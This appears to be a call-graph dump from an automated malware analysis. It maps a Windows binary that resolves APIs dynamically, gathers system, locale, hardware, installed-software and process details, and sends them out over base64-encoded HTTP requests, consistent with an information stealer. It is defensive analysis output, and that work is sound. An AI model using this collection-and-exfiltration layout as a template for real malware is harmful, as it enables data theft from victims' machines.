913a6e 14289->14290 14291 9145c0 2 API calls 14290->14291 14292 913a87 14291->14292 14293 9145c0 2 API calls 14292->14293 14294 913aa0 14293->14294 14295 9145c0 2 API calls 14294->14295 14296 913ab9 14295->14296 14297 9145c0 2 API calls 14296->14297 14298 913ad2 14297->14298 14299 9145c0 2 API calls 14298->14299 14300 913aeb 14299->14300 14301 9145c0 2 API calls 14300->14301 14302 913b04 14301->14302 14303 9145c0 2 API calls 14302->14303 14304 913b1d 14303->14304 14305 9145c0 2 API calls 14304->14305 14306 913b36 14305->14306 14307 9145c0 2 API calls 14306->14307 14308 913b4f 14307->14308 14309 9145c0 2 API calls 14308->14309 14310 913b68 14309->14310 14311 9145c0 2 API calls 14310->14311 14312 913b81 14311->14312 14313 9145c0 2 API calls 14312->14313 14314 913b9a 14313->14314 14315 9145c0 2 API calls 14314->14315 14316 913bb3 14315->14316 14317 9145c0 2 API calls 14316->14317 14318 913bcc 
14317->14318 14319 9145c0 2 API calls 14318->14319 14320 913be5 14319->14320 14321 9145c0 2 API calls 14320->14321 14322 913bfe 14321->14322 14323 9145c0 2 API calls 14322->14323 14324 913c17 14323->14324 14325 9145c0 2 API calls 14324->14325 14326 913c30 14325->14326 14327 9145c0 2 API calls 14326->14327 14328 913c49 14327->14328 14329 9145c0 2 API calls 14328->14329 14330 913c62 14329->14330 14331 9145c0 2 API calls 14330->14331 14332 913c7b 14331->14332 14333 9145c0 2 API calls 14332->14333 14334 913c94 14333->14334 14335 9145c0 2 API calls 14334->14335 14336 913cad 14335->14336 14337 9145c0 2 API calls 14336->14337 14338 913cc6 14337->14338 14339 9145c0 2 API calls 14338->14339 14340 913cdf 14339->14340 14341 9145c0 2 API calls 14340->14341 14342 913cf8 14341->14342 14343 9145c0 2 API calls 14342->14343 14344 913d11 14343->14344 14345 9145c0 2 API calls 14344->14345 14346 913d2a 14345->14346 14347 9145c0 2 API calls 14346->14347 14348 913d43 14347->14348 14349 9145c0 2 API calls 14348->14349 14350 913d5c 14349->14350 14351 9145c0 2 API calls 14350->14351 14352 913d75 14351->14352 14353 9145c0 2 API calls 14352->14353 14354 913d8e 14353->14354 14355 9145c0 2 API calls 14354->14355 14356 913da7 14355->14356 14357 9145c0 2 API calls 14356->14357 14358 913dc0 14357->14358 14359 9145c0 2 API calls 14358->14359 14360 913dd9 14359->14360 14361 9145c0 2 API calls 14360->14361 14362 913df2 14361->14362 14363 9145c0 2 API calls 14362->14363 14364 913e0b 14363->14364 14365 9145c0 2 API calls 14364->14365 14366 913e24 14365->14366 14367 9145c0 2 API calls 14366->14367 14368 913e3d 14367->14368 14369 9145c0 2 API calls 14368->14369 14370 913e56 14369->14370 14371 9145c0 2 API calls 14370->14371 14372 913e6f 14371->14372 14373 9145c0 2 API calls 14372->14373 14374 913e88 14373->14374 14375 9145c0 2 API calls 14374->14375 14376 913ea1 14375->14376 14377 9145c0 2 API calls 14376->14377 14378 913eba 14377->14378 14379 9145c0 2 API calls 14378->14379 14380 913ed3 14379->14380 
14381 9145c0 2 API calls 14380->14381 14382 913eec 14381->14382 14383 9145c0 2 API calls 14382->14383 14384 913f05 14383->14384 14385 9145c0 2 API calls 14384->14385 14386 913f1e 14385->14386 14387 9145c0 2 API calls 14386->14387 14388 913f37 14387->14388 14389 9145c0 2 API calls 14388->14389 14390 913f50 14389->14390 14391 9145c0 2 API calls 14390->14391 14392 913f69 14391->14392 14393 9145c0 2 API calls 14392->14393 14394 913f82 14393->14394 14395 9145c0 2 API calls 14394->14395 14396 913f9b 14395->14396 14397 9145c0 2 API calls 14396->14397 14398 913fb4 14397->14398 14399 9145c0 2 API calls 14398->14399 14400 913fcd 14399->14400 14401 9145c0 2 API calls 14400->14401 14402 913fe6 14401->14402 14403 9145c0 2 API calls 14402->14403 14404 913fff 14403->14404 14405 9145c0 2 API calls 14404->14405 14406 914018 14405->14406 14407 9145c0 2 API calls 14406->14407 14408 914031 14407->14408 14409 9145c0 2 API calls 14408->14409 14410 91404a 14409->14410 14411 9145c0 2 API calls 14410->14411 14412 914063 14411->14412 14413 9145c0 2 API calls 14412->14413 14414 91407c 14413->14414 14415 9145c0 2 API calls 14414->14415 14416 914095 14415->14416 14417 9145c0 2 API calls 14416->14417 14418 9140ae 14417->14418 14419 9145c0 2 API calls 14418->14419 14420 9140c7 14419->14420 14421 9145c0 2 API calls 14420->14421 14422 9140e0 14421->14422 14423 9145c0 2 API calls 14422->14423 14424 9140f9 14423->14424 14425 9145c0 2 API calls 14424->14425 14426 914112 14425->14426 14427 9145c0 2 API calls 14426->14427 14428 91412b 14427->14428 14429 9145c0 2 API calls 14428->14429 14430 914144 14429->14430 14431 9145c0 2 API calls 14430->14431 14432 91415d 14431->14432 14433 9145c0 2 API calls 14432->14433 14434 914176 14433->14434 14435 9145c0 2 API calls 14434->14435 14436 91418f 14435->14436 14437 9145c0 2 API calls 14436->14437 14438 9141a8 14437->14438 14439 9145c0 2 API calls 14438->14439 14440 9141c1 14439->14440 14441 9145c0 2 API calls 14440->14441 14442 9141da 14441->14442 14443 9145c0 2 
API calls 14442->14443 14444 9141f3 14443->14444 14445 9145c0 2 API calls 14444->14445 14446 91420c 14445->14446 14447 9145c0 2 API calls 14446->14447 14448 914225 14447->14448 14449 9145c0 2 API calls 14448->14449 14450 91423e 14449->14450 14451 9145c0 2 API calls 14450->14451 14452 914257 14451->14452 14453 9145c0 2 API calls 14452->14453 14454 914270 14453->14454 14455 9145c0 2 API calls 14454->14455 14456 914289 14455->14456 14457 9145c0 2 API calls 14456->14457 14458 9142a2 14457->14458 14459 9145c0 2 API calls 14458->14459 14460 9142bb 14459->14460 14461 9145c0 2 API calls 14460->14461 14462 9142d4 14461->14462 14463 9145c0 2 API calls 14462->14463 14464 9142ed 14463->14464 14465 9145c0 2 API calls 14464->14465 14466 914306 14465->14466 14467 9145c0 2 API calls 14466->14467 14468 91431f 14467->14468 14469 9145c0 2 API calls 14468->14469 14470 914338 14469->14470 14471 9145c0 2 API calls 14470->14471 14472 914351 14471->14472 14473 9145c0 2 API calls 14472->14473 14474 91436a 14473->14474 14475 9145c0 2 API calls 14474->14475 14476 914383 14475->14476 14477 9145c0 2 API calls 14476->14477 14478 91439c 14477->14478 14479 9145c0 2 API calls 14478->14479 14480 9143b5 14479->14480 14481 9145c0 2 API calls 14480->14481 14482 9143ce 14481->14482 14483 9145c0 2 API calls 14482->14483 14484 9143e7 14483->14484 14485 9145c0 2 API calls 14484->14485 14486 914400 14485->14486 14487 9145c0 2 API calls 14486->14487 14488 914419 14487->14488 14489 9145c0 2 API calls 14488->14489 14490 914432 14489->14490 14491 9145c0 2 API calls 14490->14491 14492 91444b 14491->14492 14493 9145c0 2 API calls 14492->14493 14494 914464 14493->14494 14495 9145c0 2 API calls 14494->14495 14496 91447d 14495->14496 14497 9145c0 2 API calls 14496->14497 14498 914496 14497->14498 14499 9145c0 2 API calls 14498->14499 14500 9144af 14499->14500 14501 9145c0 2 API calls 14500->14501 14502 9144c8 14501->14502 14503 9145c0 2 API calls 14502->14503 14504 9144e1 14503->14504 14505 9145c0 2 API calls 
14504->14505 14506 9144fa 14505->14506 14507 9145c0 2 API calls 14506->14507 14508 914513 14507->14508 14509 9145c0 2 API calls 14508->14509 14510 91452c 14509->14510 14511 9145c0 2 API calls 14510->14511 14512 914545 14511->14512 14513 9145c0 2 API calls 14512->14513 14514 91455e 14513->14514 14515 9145c0 2 API calls 14514->14515 14516 914577 14515->14516 14517 9145c0 2 API calls 14516->14517 14518 914590 14517->14518 14519 9145c0 2 API calls 14518->14519 14520 9145a9 14519->14520 14521 929c10 14520->14521 14522 929c20 43 API calls 14521->14522 14523 92a036 8 API calls 14521->14523 14522->14523 14524 92a146 14523->14524 14525 92a0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14523->14525 14526 92a153 8 API calls 14524->14526 14527 92a216 14524->14527 14525->14524 14526->14527 14528 92a298 14527->14528 14529 92a21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14527->14529 14530 92a337 14528->14530 14531 92a2a5 6 API calls 14528->14531 14529->14528 14532 92a344 9 API calls 14530->14532 14533 92a41f 14530->14533 14531->14530 14532->14533 14534 92a4a2 14533->14534 14535 92a428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14533->14535 14536 92a4ab GetProcAddress GetProcAddress 14534->14536 14537 92a4dc 14534->14537 14535->14534 14536->14537 14538 92a515 14537->14538 14539 92a4e5 GetProcAddress GetProcAddress 14537->14539 14540 92a612 14538->14540 14541 92a522 10 API calls 14538->14541 14539->14538 14542 92a61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14540->14542 14543 92a67d 14540->14543 14541->14540 14542->14543 14544 92a686 GetProcAddress 14543->14544 14545 92a69e 14543->14545 14544->14545 14546 92a6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14545->14546 14547 925ca3 14545->14547 14546->14547 14548 911590 14547->14548 15667 911670 14548->15667 14551 92a7a0 lstrcpy 14552 9115b5 14551->14552 14553 92a7a0 lstrcpy 14552->14553 14554 9115c7 
14553->14554 14555 92a7a0 lstrcpy 14554->14555 14556 9115d9 14555->14556 14557 92a7a0 lstrcpy 14556->14557 14558 911663 14557->14558 14559 925510 14558->14559 14560 925521 14559->14560 14561 92a820 2 API calls 14560->14561 14562 92552e 14561->14562 14563 92a820 2 API calls 14562->14563 14564 92553b 14563->14564 14565 92a820 2 API calls 14564->14565 14566 925548 14565->14566 14567 92a740 lstrcpy 14566->14567 14568 925555 14567->14568 14569 92a740 lstrcpy 14568->14569 14570 925562 14569->14570 14571 92a740 lstrcpy 14570->14571 14572 92556f 14571->14572 14573 92a740 lstrcpy 14572->14573 14601 92557c 14573->14601 14574 911590 lstrcpy 14574->14601 14575 9252c0 25 API calls 14575->14601 14576 925643 StrCmpCA 14576->14601 14577 9256a0 StrCmpCA 14578 9257dc 14577->14578 14577->14601 14579 92a8a0 lstrcpy 14578->14579 14580 9257e8 14579->14580 14581 92a820 2 API calls 14580->14581 14582 9257f6 14581->14582 14584 92a820 2 API calls 14582->14584 14583 925856 StrCmpCA 14585 925991 14583->14585 14583->14601 14587 925805 14584->14587 14586 92a8a0 lstrcpy 14585->14586 14588 92599d 14586->14588 14589 911670 lstrcpy 14587->14589 14591 92a820 2 API calls 14588->14591 14603 925811 14589->14603 14590 92a820 lstrlen lstrcpy 14590->14601 14592 9259ab 14591->14592 14597 92a820 2 API calls 14592->14597 14593 925a0b StrCmpCA 14594 925a16 Sleep 14593->14594 14595 925a28 14593->14595 14594->14601 14598 92a8a0 lstrcpy 14595->14598 14596 92a740 lstrcpy 14596->14601 14599 9259ba 14597->14599 14600 925a34 14598->14600 14602 911670 lstrcpy 14599->14602 14604 92a820 2 API calls 14600->14604 14601->14574 14601->14575 14601->14576 14601->14577 14601->14583 14601->14590 14601->14593 14601->14596 14606 9251f0 20 API calls 14601->14606 14609 92578a StrCmpCA 14601->14609 14611 92593f StrCmpCA 14601->14611 14612 92a7a0 lstrcpy 14601->14612 14613 92a8a0 lstrcpy 14601->14613 14602->14603 14603->13666 14605 925a43 14604->14605 14607 92a820 2 API calls 14605->14607 14606->14601 14608 925a52 14607->14608 14610 
911670 lstrcpy 14608->14610 14609->14601 14610->14603 14611->14601 14612->14601 14613->14601 14615 927553 GetVolumeInformationA 14614->14615 14616 92754c 14614->14616 14617 927591 14615->14617 14616->14615 14618 9275fc GetProcessHeap RtlAllocateHeap 14617->14618 14619 927628 wsprintfA 14618->14619 14620 927619 14618->14620 14622 92a740 lstrcpy 14619->14622 14621 92a740 lstrcpy 14620->14621 14623 925da7 14621->14623 14622->14623 14623->13687 14625 92a7a0 lstrcpy 14624->14625 14626 914899 14625->14626 15676 9147b0 14626->15676 14628 9148a5 14629 92a740 lstrcpy 14628->14629 14630 9148d7 14629->14630 14631 92a740 lstrcpy 14630->14631 14632 9148e4 14631->14632 14633 92a740 lstrcpy 14632->14633 14634 9148f1 14633->14634 14635 92a740 lstrcpy 14634->14635 14636 9148fe 14635->14636 14637 92a740 lstrcpy 14636->14637 14638 91490b InternetOpenA StrCmpCA 14637->14638 14639 914944 14638->14639 14640 914ecb InternetCloseHandle 14639->14640 15682 928b60 14639->15682 14642 914ee8 14640->14642 15697 919ac0 CryptStringToBinaryA 14642->15697 14643 914963 15690 92a920 14643->15690 14646 914976 14648 92a8a0 lstrcpy 14646->14648 14653 91497f 14648->14653 14649 92a820 2 API calls 14650 914f05 14649->14650 14652 92a9b0 4 API calls 14650->14652 14651 914f27 ctype 14655 92a7a0 lstrcpy 14651->14655 14654 914f1b 14652->14654 14657 92a9b0 4 API calls 14653->14657 14656 92a8a0 lstrcpy 14654->14656 14668 914f57 14655->14668 14656->14651 14658 9149a9 14657->14658 14659 92a8a0 lstrcpy 14658->14659 14660 9149b2 14659->14660 14661 92a9b0 4 API calls 14660->14661 14662 9149d1 14661->14662 14663 92a8a0 lstrcpy 14662->14663 14664 9149da 14663->14664 14665 92a920 3 API calls 14664->14665 14666 9149f8 14665->14666 14667 92a8a0 lstrcpy 14666->14667 14669 914a01 14667->14669 14668->13690 14670 92a9b0 4 API calls 14669->14670 14671 914a20 14670->14671 14672 92a8a0 lstrcpy 14671->14672 14673 914a29 14672->14673 14674 92a9b0 4 API calls 14673->14674 14675 914a48 14674->14675 14676 92a8a0 lstrcpy 14675->14676 
14677 914a51 14676->14677 14678 92a9b0 4 API calls 14677->14678 14679 914a7d 14678->14679 14680 92a920 3 API calls 14679->14680 14681 914a84 14680->14681 14682 92a8a0 lstrcpy 14681->14682 14683 914a8d 14682->14683 14684 914aa3 InternetConnectA 14683->14684 14684->14640 14685 914ad3 HttpOpenRequestA 14684->14685 14687 914b28 14685->14687 14688 914ebe InternetCloseHandle 14685->14688 14689 92a9b0 4 API calls 14687->14689 14688->14640 14690 914b3c 14689->14690 14691 92a8a0 lstrcpy 14690->14691 14692 914b45 14691->14692 14693 92a920 3 API calls 14692->14693 14694 914b63 14693->14694 14695 92a8a0 lstrcpy 14694->14695 14696 914b6c 14695->14696 14697 92a9b0 4 API calls 14696->14697 14698 914b8b 14697->14698 14699 92a8a0 lstrcpy 14698->14699 14700 914b94 14699->14700 14701 92a9b0 4 API calls 14700->14701 14702 914bb5 14701->14702 14703 92a8a0 lstrcpy 14702->14703 14704 914bbe 14703->14704 14705 92a9b0 4 API calls 14704->14705 14706 914bde 14705->14706 14707 92a8a0 lstrcpy 14706->14707 14708 914be7 14707->14708 14709 92a9b0 4 API calls 14708->14709 14710 914c06 14709->14710 14711 92a8a0 lstrcpy 14710->14711 14712 914c0f 14711->14712 14713 92a920 3 API calls 14712->14713 14714 914c2d 14713->14714 14715 92a8a0 lstrcpy 14714->14715 14716 914c36 14715->14716 14717 92a9b0 4 API calls 14716->14717 14718 914c55 14717->14718 14719 92a8a0 lstrcpy 14718->14719 14720 914c5e 14719->14720 14721 92a9b0 4 API calls 14720->14721 14722 914c7d 14721->14722 14723 92a8a0 lstrcpy 14722->14723 14724 914c86 14723->14724 14725 92a920 3 API calls 14724->14725 14726 914ca4 14725->14726 14727 92a8a0 lstrcpy 14726->14727 14728 914cad 14727->14728 14729 92a9b0 4 API calls 14728->14729 14730 914ccc 14729->14730 14731 92a8a0 lstrcpy 14730->14731 14732 914cd5 14731->14732 14733 92a9b0 4 API calls 14732->14733 14734 914cf6 14733->14734 14735 92a8a0 lstrcpy 14734->14735 14736 914cff 14735->14736 14737 92a9b0 4 API calls 14736->14737 14738 914d1f 14737->14738 14739 92a8a0 lstrcpy 14738->14739 14740 914d28 
14739->14740 14741 92a9b0 4 API calls 14740->14741 14742 914d47 14741->14742 14743 92a8a0 lstrcpy 14742->14743 14744 914d50 14743->14744 14745 92a920 3 API calls 14744->14745 14746 914d6e 14745->14746 14747 92a8a0 lstrcpy 14746->14747 14748 914d77 14747->14748 14749 92a740 lstrcpy 14748->14749 14750 914d92 14749->14750 14751 92a920 3 API calls 14750->14751 14752 914db3 14751->14752 14753 92a920 3 API calls 14752->14753 14754 914dba 14753->14754 14755 92a8a0 lstrcpy 14754->14755 14756 914dc6 14755->14756 14757 914de7 lstrlen 14756->14757 14758 914dfa 14757->14758 14759 914e03 lstrlen 14758->14759 15696 92aad0 14759->15696 14761 914e13 HttpSendRequestA 14762 914e32 InternetReadFile 14761->14762 14763 914e67 InternetCloseHandle 14762->14763 14768 914e5e 14762->14768 14765 92a800 14763->14765 14765->14688 14766 92a9b0 4 API calls 14766->14768 14767 92a8a0 lstrcpy 14767->14768 14768->14762 14768->14763 14768->14766 14768->14767 15703 92aad0 14769->15703 14771 9217c4 StrCmpCA 14772 9217cf ExitProcess 14771->14772 14784 9217d7 14771->14784 14773 9219c2 14773->13692 14774 921932 StrCmpCA 14774->14784 14775 921913 StrCmpCA 14775->14784 14776 921970 StrCmpCA 14776->14784 14777 9218f1 StrCmpCA 14777->14784 14778 921951 StrCmpCA 14778->14784 14779 92187f StrCmpCA 14779->14784 14780 92185d StrCmpCA 14780->14784 14781 9218cf StrCmpCA 14781->14784 14782 9218ad StrCmpCA 14782->14784 14783 92a820 lstrlen lstrcpy 14783->14784 14784->14773 14784->14774 14784->14775 14784->14776 14784->14777 14784->14778 14784->14779 14784->14780 14784->14781 14784->14782 14784->14783 14786 92a7a0 lstrcpy 14785->14786 14787 915979 14786->14787 14788 9147b0 2 API calls 14787->14788 14789 915985 14788->14789 14790 92a740 lstrcpy 14789->14790 14791 9159ba 14790->14791 14792 92a740 lstrcpy 14791->14792 14793 9159c7 14792->14793 14794 92a740 lstrcpy 14793->14794 14795 9159d4 14794->14795 14796 92a740 lstrcpy 14795->14796 14797 9159e1 14796->14797 14798 92a740 lstrcpy 14797->14798 14799 9159ee InternetOpenA 
StrCmpCA 14798->14799 14800 915a1d 14799->14800 14801 915fc3 InternetCloseHandle 14800->14801 14803 928b60 3 API calls 14800->14803 14802 915fe0 14801->14802 14806 919ac0 4 API calls 14802->14806 14804 915a3c 14803->14804 14805 92a920 3 API calls 14804->14805 14807 915a4f 14805->14807 14808 915fe6 14806->14808 14809 92a8a0 lstrcpy 14807->14809 14810 92a820 2 API calls 14808->14810 14812 91601f ctype 14808->14812 14814 915a58 14809->14814 14811 915ffd 14810->14811 14813 92a9b0 4 API calls 14811->14813 14816 92a7a0 lstrcpy 14812->14816 14815 916013 14813->14815 14818 92a9b0 4 API calls 14814->14818 14817 92a8a0 lstrcpy 14815->14817 14826 91604f 14816->14826 14817->14812 14819 915a82 14818->14819 14820 92a8a0 lstrcpy 14819->14820 14821 915a8b 14820->14821 14822 92a9b0 4 API calls 14821->14822 14823 915aaa 14822->14823 14824 92a8a0 lstrcpy 14823->14824 14825 915ab3 14824->14825 14827 92a920 3 API calls 14825->14827 14826->13698 14828 915ad1 14827->14828 14829 92a8a0 lstrcpy 14828->14829 14830 915ada 14829->14830 14831 92a9b0 4 API calls 14830->14831 14832 915af9 14831->14832 14833 92a8a0 lstrcpy 14832->14833 14834 915b02 14833->14834 14835 92a9b0 4 API calls 14834->14835 14836 915b21 14835->14836 14837 92a8a0 lstrcpy 14836->14837 14838 915b2a 14837->14838 14839 92a9b0 4 API calls 14838->14839 14840 915b56 14839->14840 14841 92a920 3 API calls 14840->14841 14842 915b5d 14841->14842 14843 92a8a0 lstrcpy 14842->14843 14844 915b66 14843->14844 14845 915b7c InternetConnectA 14844->14845 14845->14801 14846 915bac HttpOpenRequestA 14845->14846 14848 915fb6 InternetCloseHandle 14846->14848 14849 915c0b 14846->14849 14848->14801 14850 92a9b0 4 API calls 14849->14850 14851 915c1f 14850->14851 14852 92a8a0 lstrcpy 14851->14852 14853 915c28 14852->14853 14854 92a920 3 API calls 14853->14854 14855 915c46 14854->14855 14856 92a8a0 lstrcpy 14855->14856 14857 915c4f 14856->14857 14858 92a9b0 4 API calls 14857->14858 14859 915c6e 14858->14859 14860 92a8a0 lstrcpy 14859->14860 14861 
915c77 14860->14861 14862 92a9b0 4 API calls 14861->14862 14863 915c98 14862->14863 14864 92a8a0 lstrcpy 14863->14864 14865 915ca1 14864->14865 14866 92a9b0 4 API calls 14865->14866 14867 915cc1 14866->14867 14868 92a8a0 lstrcpy 14867->14868 14869 915cca 14868->14869 14870 92a9b0 4 API calls 14869->14870 14871 915ce9 14870->14871 14872 92a8a0 lstrcpy 14871->14872 14873 915cf2 14872->14873 14874 92a920 3 API calls 14873->14874 14875 915d10 14874->14875 14876 92a8a0 lstrcpy 14875->14876 14877 915d19 14876->14877 14878 92a9b0 4 API calls 14877->14878 14879 915d38 14878->14879 14880 92a8a0 lstrcpy 14879->14880 14881 915d41 14880->14881 14882 92a9b0 4 API calls 14881->14882 14883 915d60 14882->14883 14884 92a8a0 lstrcpy 14883->14884 14885 915d69 14884->14885 14886 92a920 3 API calls 14885->14886 14887 915d87 14886->14887 14888 92a8a0 lstrcpy 14887->14888 14889 915d90 14888->14889 14890 92a9b0 4 API calls 14889->14890 14891 915daf 14890->14891 14892 92a8a0 lstrcpy 14891->14892 14893 915db8 14892->14893 14894 92a9b0 4 API calls 14893->14894 14895 915dd9 14894->14895 14896 92a8a0 lstrcpy 14895->14896 14897 915de2 14896->14897 14898 92a9b0 4 API calls 14897->14898 14899 915e02 14898->14899 14900 92a8a0 lstrcpy 14899->14900 14901 915e0b 14900->14901 14902 92a9b0 4 API calls 14901->14902 14903 915e2a 14902->14903 14904 92a8a0 lstrcpy 14903->14904 14905 915e33 14904->14905 14906 92a920 3 API calls 14905->14906 14907 915e54 14906->14907 14908 92a8a0 lstrcpy 14907->14908 14909 915e5d 14908->14909 14910 915e70 lstrlen 14909->14910 15704 92aad0 14910->15704 14912 915e81 lstrlen GetProcessHeap RtlAllocateHeap 15705 92aad0 14912->15705 14914 915eae lstrlen 14915 915ebe 14914->14915 14916 915ed7 lstrlen 14915->14916 14917 915ee7 14916->14917 14918 915ef0 lstrlen 14917->14918 14919 915f03 14918->14919 14920 915f1a lstrlen 14919->14920 15706 92aad0 14920->15706 14922 915f2a HttpSendRequestA 14923 915f35 InternetReadFile 14922->14923 14924 915f61 14923->14924 14925 915f6a 
InternetCloseHandle 14923->14925 14924->14923 14924->14925 14927 92a9b0 4 API calls 14924->14927 14928 92a8a0 lstrcpy 14924->14928 14925->14848 14927->14924 14928->14924 14931 921077 14929->14931 14930 921151 14930->13700 14931->14930 14932 92a820 lstrlen lstrcpy 14931->14932 14932->14931 14934 920db7 14933->14934 14935 920f17 14934->14935 14936 920e27 StrCmpCA 14934->14936 14937 920e67 StrCmpCA 14934->14937 14938 920ea4 StrCmpCA 14934->14938 14939 92a820 lstrlen lstrcpy 14934->14939 14935->13708 14936->14934 14937->14934 14938->14934 14939->14934 14943 920f67 14940->14943 14941 921044 14941->13716 14942 920fb2 StrCmpCA 14942->14943 14943->14941 14943->14942 14944 92a820 lstrlen lstrcpy 14943->14944 14944->14943 14946 92a740 lstrcpy 14945->14946 14947 921a26 14946->14947 14948 92a9b0 4 API calls 14947->14948 14949 921a37 14948->14949 14950 92a8a0 lstrcpy 14949->14950 14951 921a40 14950->14951 14952 92a9b0 4 API calls 14951->14952 14953 921a5b 14952->14953 14954 92a8a0 lstrcpy 14953->14954 14955 921a64 14954->14955 14956 92a9b0 4 API calls 14955->14956 14957 921a7d 14956->14957 14958 92a8a0 lstrcpy 14957->14958 14959 921a86 14958->14959 14960 92a9b0 4 API calls 14959->14960 14961 921aa1 14960->14961 14962 92a8a0 lstrcpy 14961->14962 14963 921aaa 14962->14963 14964 92a9b0 4 API calls 14963->14964 14965 921ac3 14964->14965 14966 92a8a0 lstrcpy 14965->14966 14967 921acc 14966->14967 14968 92a9b0 4 API calls 14967->14968 14969 921ae7 14968->14969 14970 92a8a0 lstrcpy 14969->14970 14971 921af0 14970->14971 14972 92a9b0 4 API calls 14971->14972 14973 921b09 14972->14973 14974 92a8a0 lstrcpy 14973->14974 14975 921b12 14974->14975 14976 92a9b0 4 API calls 14975->14976 14977 921b2d 14976->14977 14978 92a8a0 lstrcpy 14977->14978 14979 921b36 14978->14979 14980 92a9b0 4 API calls 14979->14980 14981 921b4f 14980->14981 14982 92a8a0 lstrcpy 14981->14982 14983 921b58 14982->14983 14984 92a9b0 4 API calls 14983->14984 14985 921b76 14984->14985 14986 92a8a0 lstrcpy 14985->14986 
14987 921b7f 14986->14987 14988 927500 6 API calls 14987->14988 14989 921b96 14988->14989 14990 92a920 3 API calls 14989->14990 14991 921ba9 14990->14991 14992 92a8a0 lstrcpy 14991->14992 14993 921bb2 14992->14993 14994 92a9b0 4 API calls 14993->14994 14995 921bdc 14994->14995 14996 92a8a0 lstrcpy 14995->14996 14997 921be5 14996->14997 14998 92a9b0 4 API calls 14997->14998 14999 921c05 14998->14999 15000 92a8a0 lstrcpy 14999->15000 15001 921c0e 15000->15001 15707 927690 GetProcessHeap RtlAllocateHeap 15001->15707 15004 92a9b0 4 API calls 15005 921c2e 15004->15005 15006 92a8a0 lstrcpy 15005->15006 15007 921c37 15006->15007 15008 92a9b0 4 API calls 15007->15008 15009 921c56 15008->15009 15010 92a8a0 lstrcpy 15009->15010 15011 921c5f 15010->15011 15012 92a9b0 4 API calls 15011->15012 15013 921c80 15012->15013 15014 92a8a0 lstrcpy 15013->15014 15015 921c89 15014->15015 15714 9277c0 GetCurrentProcess IsWow64Process 15015->15714 15018 92a9b0 4 API calls 15019 921ca9 15018->15019 15020 92a8a0 lstrcpy 15019->15020 15021 921cb2 15020->15021 15022 92a9b0 4 API calls 15021->15022 15023 921cd1 15022->15023 15024 92a8a0 lstrcpy 15023->15024 15025 921cda 15024->15025 15026 92a9b0 4 API calls 15025->15026 15027 921cfb 15026->15027 15028 92a8a0 lstrcpy 15027->15028 15029 921d04 15028->15029 15030 927850 3 API calls 15029->15030 15031 921d14 15030->15031 15032 92a9b0 4 API calls 15031->15032 15033 921d24 15032->15033 15034 92a8a0 lstrcpy 15033->15034 15035 921d2d 15034->15035 15036 92a9b0 4 API calls 15035->15036 15037 921d4c 15036->15037 15038 92a8a0 lstrcpy 15037->15038 15039 921d55 15038->15039 15040 92a9b0 4 API calls 15039->15040 15041 921d75 15040->15041 15042 92a8a0 lstrcpy 15041->15042 15043 921d7e 15042->15043 15044 9278e0 3 API calls 15043->15044 15045 921d8e 15044->15045 15046 92a9b0 4 API calls 15045->15046 15047 921d9e 15046->15047 15048 92a8a0 lstrcpy 15047->15048 15049 921da7 15048->15049 15050 92a9b0 4 API calls 15049->15050 15051 921dc6 15050->15051 15052 92a8a0 
Call graph (text rendering of the graph, condensed to the functions it shows and the Windows APIs each one calls)
• 921dcf-922699: builds one text report; between each collector below it calls 92a9b0 (lstrcpy, lstrlen, lstrcpy, lstrcat: append) and 92a8a0 (lstrcpy: copy); finishes with lstrlen (92265a), 92a740 (lstrcpy), 911590 (five 92a7a0 lstrcpy calls), then 925190 -> 915100
• 927980: GetProcessHeap, RtlAllocateHeap, GetLocalTime, wsprintfA
• 927a30: GetProcessHeap, RtlAllocateHeap, GetTimeZoneInformation, wsprintfA (927a9a)
• 927b00: GetUserDefaultLocaleName, then 928d20: LocalAlloc, CharToOemW
• 927b90: 92a740 (lstrcpy), GetKeyboardLayoutList, LocalAlloc, GetKeyboardLayoutList (927bcc), loop of GetLocaleInfoA (927c46) with 92a9b0/92a8a0, LocalFree (927d1e), 92a7a0 (lstrcpy)
• 927d80: GetSystemPowerStatus
• 92207e: GetCurrentProcessId, then 929470: OpenProcess, GetModuleFileNameExA, CloseHandle (929493), 92a740 (lstrcpy)
• 927e00: GetProcessHeap, RtlAllocateHeap, RegOpenKeyExA, RegQueryValueExA (927e68), RegCloseKey (927e8e)
• 927f60: GetLogicalProcessorInformationEx (927fb9), GetLastError (927fd8), loop back through 928a10 (GetProcessHeap, RtlAllocateHeap) and 9289f0 (GetProcessHeap, HeapFree), wsprintfA (928084)
• 927ed0: GetSystemInfo, wsprintfA
• 928100: GetProcessHeap, RtlAllocateHeap, GlobalMemoryStatusEx (92814d), wsprintfA (92819b)
• 9287c0: GetProcessHeap, RtlAllocateHeap, wsprintfA (9287fb), 92a740 (lstrcpy)
• 9281f0: 92a740 (lstrcpy), loop of 92a9b0 (lstrcpy, lstrlen, lstrcpy, lstrcat) and 92a8a0 (lstrcpy), 92a7a0 (lstrcpy)
• 928320 (17 API calls): 92a740 (lstrcpy), RegOpenKeyExA (92835c), loop of RegEnumKeyExA (9283f8), wsprintfA + RegOpenKeyExA (92843f), RegQueryValueExA (9284c1), lstrlen (9284fa), RegQueryValueExA (92856e), RegCloseKey (928485, 928601, 928613), 92a7a0 (lstrcpy)
• 928680: 92a740 (lstrcpy), CreateToolhelp32Snapshot, Process32First (9286bc), loop of Process32Next (9286e8) with 92a9b0/92a8a0, CloseHandle (92875d), 92a7a0 (lstrcpy)
• 925190 -> 915100: 92a7a0 (lstrcpy), 911590 (lstrcpy), 9147b0 (lstrlen at 914838, InternetCrackUrlA at 914848), 928ea0 (CryptBinaryToStringA at 928ead, GetProcessHeap, RtlAllocateHeap, CryptBinaryToStringA at 928f05), lstrlen (915192), five 92a740 (lstrcpy) calls, InternetOpenA + StrCmpCA (9151fd), 928b60 (lstrcpy, lstrcpy, GetSystemTime at 928b82, lstrcpy), request assembly with 92a920 (lstrcpy, lstrcat, lstrcpy), 92a8a0 and 92a9b0, InternetConnectA (915329), HttpOpenRequestA (915359), InternetCloseHandle (9158b7, 9158c4)
• 915009: InternetOpenUrlA, loop of InternetReadFile (91502a), InternetCloseHandle x2 (9150a0)
• 919af9: LocalAlloc, CryptStringToBinaryA (919b14), LocalFree (919b39)
